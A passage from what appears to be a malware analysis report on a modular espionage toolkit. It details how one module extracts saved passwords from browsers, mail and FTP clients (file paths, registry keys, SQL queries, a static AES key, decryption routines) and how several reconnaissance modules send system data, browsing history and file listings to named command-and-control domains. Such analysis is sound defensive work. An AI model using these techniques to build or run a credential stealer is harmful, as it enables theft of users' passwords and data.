If the library is successfully loaded then retrieves an interface pointer to a storage provider, enumerates provider types and subtypes. If the Resource Type corresponds to IE Protected Site or Outlook Account then reads the data item name and the data item buffer. As a result it retrieves IE HTTP/FTP basic authentication password and corresponding hosts, for Outlook it retrieves POP3 passwords and proceeds with working with registry. If the ResourseType corresponds to IE6 the module also interprets ItemName as a URL, and resolves the host to IP.

In case of Outlook enumerates subkeys of the following key and retrieves the value data in them:

HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts\

Values: “POP3 Password2", "IMAP Password2", "HTTPMail Password2".

If one of the values data coincides with previously retrieved passwords from PStore, then retrieves the remained values data:

• Account Name
• SMTP Email Address
• SMTP Server
• HTTPMail User Name
• HTTPMail Server
• POP3 User Name
• POP3 Server
• IMAP User Name
• IMAP Server

6.  Opera, Chrome, Firefox, Thunderbird data

Buffer1 sample data:

  BEGIN : Opera, GCH, MFF, THB

    OPERA : wand.dat file found and read – OK

    CHROME : Login Data file found and read – OK

    THUNDERBIRD : signon file path '%s' found - OK

Opera: Reads file: %APPDATA%\Opera\Opera\wand.dat, decrypts it (3DES + proprietary), parses it and retrieves hosts and corresponding passwords.

Chrome: In the Chrome processing function the module uses SQLLite lib to read file “%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data“ as a DB. It makes a query “SELECT * FROM logins” to retrieve hosts and saved passwords. It retrieves "Password_value" field to decrypt with CryptUnprotectData API call.

Firefox:  Reads the file %APPDATA%\Mozilla\Firefox\profiles.ini and retrieves “User Profiles Path” from it.

Queries value in the following key to retrieve Firefox path:

HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

In the Firefox directory tries to load nss3.dll, plc4.dll and get the following functions: NSS_Init, NSS_Shutdown, PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword, PL_Base64Decode.

Sequentially tries to open and read file %FirefoxProfilesPath%\signons.txt or signons2.txt or signons3.txt or sqlite.sqlite (these files used in different Firefox versions). In case of the *.txt files the module parses a file, retrieves urls, decrypts usernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In case of sqlite.sqlite it makes a query “SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins”, decrypts usernames and passwords using PL_Base64Decode and PK11SDR_Decrypt functions.

Thunderbird: Reads the file %APPDATA%\Thunderbird\profiles.ini and retrieves “User Profiles Path” from it. Queries value in the following key to retrieve Thunderbird path:

HKLM\ SOFTWARE\Clients\Mail\Mozilla Thunderbird\shell\open\command

In the Thunderbird directory tries to load nss3.dll, plc4.dll and get the following functions: NSS_Init, NSS_Shutdown, PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword, PL_Base64Decode.

Sequentially tries to open and read file %ThunderbirdProfilesPath%\signons.txt or signons2.txt or signons3.txtor sqlite.sqlite (these files used in different Thunderbird versions). In case of the *.txt files the module parses a file, retrieves urls, decrypts usernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In case of sqlite.sqlite it makes a query “SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins”, decrypts usernames and passwords using PL_Base64Decode and PK11SDR_Decrypt functions.

7.  The Bat data

Buffer1 data sample:

  BEGIN : The Bat

    THE BAT : Account.CFN '%s' read – OK

Searches for the “Account.CFN” file, decrypts it with an algorithm based on a bitwise operations and 1-byte XOR, then extracts hostnames, usernames and passwords.

8.  Filezilla data

Buffer1 data sample:

  BEGIN : FileZilla

    FILE ZILLA : sitemanager.xml file found – OK

    FILE ZILLA : sitemanager.xml '%s' opened - OK

Searches for “sitemanager.xml” file, parses it and extracts Host, User, Port and Pass values. No decryption routines are used in processing the file.

9.  CoreFTP data

Buffer1 data sample:

  BEGIN : CoreFtp

    CORE FTP : regkey of core ftp '%s' opened – OK

    CORE FTP : password is present - OK

Tries to open the following registry key where %d is incremented starting from 0:

HKCU\Software\FTPWare\CoreFTP\Sites\%d

Retrieves the value data for: "Host", "Port", "User", "PW".

The “PW” data is decrypted using AES-128-ECB with a static key “hdfzpysvpzimorhk”.

10.  IncrediMail data

Buffer1 sample data

  BEGIN : IncrediMail

    INCREDI : regkey Identities opened - OK

Enumerates subkeys and retrieves the value data in them:

HKCU\Software\IncrediMail\Identities\%s\Accounts\%s

Value names: "PopPort", "Technology", "PopServer", "EmailAddress", "PopPassword".

The “PopPassword” data is decrypted using a proprietary algorithm based on simple  xor’ing.

Network communication

The final Buffer (which contains only Buffer1 in observed version, Buffer2 is not added) is compressed with Zlib, encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

The module sequentially tries to send data to the CnCs specified in the configuration resource in a loop of 7 iterations until success. The interval between server communications is 3 seconds.

It forms the HTTP header of the following pattern:

POST http://%s:%s%s HTTP/1.0

Host: %s:%s

Pragma: no-cache

Cache-Control: no-cache

Content-length: %u

Content-Type: application/x-www-form-urlencoded

POSTDATA

The POST data is of the following structure:

Magic1 (4 bytes) + D_USER_Length (4 bytes) + Number1(4 bytes) + Magic2 (4 bytes) + D_USER (as a string) + Magic3 (4 bytes) + Buffer

Magic equals to 2.

Number1 is 4-byte value that is calculated based on VolumeSerialNumber, Computer name and “ProductID” key in HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration

Magic2 equals to 0.

Magic3 equals to 0xF1E1A003.

It always expects the server to return “500” error code («Internal Server Error») in all the requests. If this error code actually received then the function returns success, and no more actions in the network function are done.

If the first sending-receiving routine returns failure then the module tries to find a proxy server and connect to it. The proxy server is found in the same way as in “Browser history” module.

Logic module

Known variants:

MD5	Size	Compilation date (payload)
6da5d548828d113fe38f9f8406a5d697	163,840 bytes	November 22, 2012

Summary

Logic module is essentially used to quickly get general information about current Windows machine and available remote network shares. The collected information is instantly sent to the Command&Control server, no local files are created.
This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility library code is linked with current module. The module was compiled with MS Visual C++ 2005.

Main

Calculates machine id using one of the following methods:

1. Find disk volume with Windows system directory and use volume serial number as system id;
2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).

The module collects the following information about current system:

1. Windows version
2. Computer name
3. User name
4. Local disk drives info:
• Volume serial number
• Filesystem name and flags
• Free and used disk space
5. Windows and Temporary directory paths
6. Environment variables
7. Active and OEM codepages
8. Network adapter MAC address
9. Accessible network shares and remote computer IPs
10. List of local processes with all loaded modules

This information is later submitted to the C&C server.

List of processes and loaded modules collected by the malware

When submitting to C&C server, it issues HTTP POST request, with hardcoded string Subject: LOGIC  and appended data. It is capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which was introduced in March of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it tries another one or gives up. 

ILogic module

Known variants:

MD5	Size	Compilation date (payload)
8a34088f776ff9c4857549b24eebcabb	151,552 bytes	November 22, 2012

Summary

ILogic module is essentially used to quickly grab Internet Explorer URL history from the local system. The collected information is instantly sent to the Command&Control server.
This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility library code is linked with current module. The module was compiled with MS Visual C++ 2005.

Main

Calculates machine id using one of the following methods:

1. Find disk volume with Windows system directory and use volume serial number as system id;
2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).

The module creates COM object by hardcoded CLSID=3C374a40-BAE4-11CF-BF7D-00AA006946EE which stands for Microsoft Url History Service. After that the module calls internal object methods to fetch browsing history. This information is later submitted to the C&C server.

Data buffer created by the malware containing URL history

When submitting to C&C server, it issues HTTP POST request, with plaintext string Subject: ILogic and appended data. It is capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which was introduced in March of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it tries another one or gives up.

Repeat2 module

Known variants:

MD5	Size	Compilation date (payload)
2be140e6abf23d6acc5fef0c11c07784	155,648 bytes	November 22, 2012

Summary

Repeat2 module is essentially used to quickly get listing from remote shares available in Windows network neighborhood. The collected information is instantly sent to the Command&Control server.
This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility library code is linked with current module. The module was compiled with MS Visual C++ 2005.

Main

Calculates machine id using one of the following methods:

1. Find disk volume with Windows system directory and use volume serial number as system id;
2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).

The module use Windows API to locate available Windows shares and get directory listings from the remote computers. This information is later submitted to the C&C server.

Hardcoded value of Subject field used in data submission stage (userid is blurred)

When submitting to C&C server, it issues HTTP POST request, with hardcoded string Subject: REPEAT2 and appended data. It is capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which was introduced in March of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it tries another one or gives up.

Reference module

Known variants:

MD5	Size	Compilation date (payload)
a2180b45002ee90ad0ec1f04ef90cb01	151,552 bytes	November 22, 2012

Summary

Reference module is essentially used to quickly grab directory/file listings of all drives attached to the local system (including network shares and usb drives). The collected information is instantly sent to the Command&Control server.
This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility library code is linked with current module. The module was compiled with MS Visual C++ 2005.

Main

Calculates machine id using one of the following methods:

1. Find disk volume with Windows system directory and use volume serial number as system id;
2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).

The module iterates through all attached drives and browses their contents. It collects directory listings including filenames, date of last modification and sizes. This information is later submitted to the C&C server.

Data buffer created by the malware containing file listing

When submitting to C&C server, it issues HTTP POST request, with plaintext string Subject: REFERENCE and appended data. It is capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which was introduced in March of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses the following constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.

C&C server connection information is stored in hardcoded string/dword values, i.e.:

Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

Server port: 80

URL path: /cgi-bin/nt/sk

The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it tries another one or gives up.

Next